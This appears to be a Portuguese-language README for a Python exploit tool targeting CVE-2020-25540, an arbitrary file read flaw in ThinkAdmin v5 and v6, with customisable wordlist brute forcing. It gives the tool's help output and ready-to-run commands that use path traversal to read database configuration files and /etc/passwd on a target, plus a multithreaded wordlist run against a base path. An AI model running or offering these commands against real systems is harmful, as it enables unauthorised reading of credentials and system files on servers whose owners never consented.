
Exploração da vulnerabilidade de leitura arbitrária de arquivos no ThinkAdmin v5 v6, com força bruta de dicionário personalizável.
Este script é usado para explorar a vulnerabilidade de leitura arbitrária de arquivos no ThinkAdmin v5, v6.
==Os caminhos das interfaces podem diferir entre versões (alguns baseados em forks do ThinkAdmin original)==
Uso básico
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
[-p PARALLEL]
Lê arquivos via API e obtém respostas
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Endereço IP ou domínio alvo
-f FILE, --file FILE Caminho do arquivo a ser lido
-w WORDLIST, --wordlist WORDLIST
Caminho do arquivo de wordlist, fornece múltiplos caminhos ou nomes de arquivos
-b BASE_PATH, --base-path BASE_PATH
Caminho base, usado para concatenar caminhos da wordlist
-p PARALLEL, --parallel PARALLEL
Número de threads paralelas
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10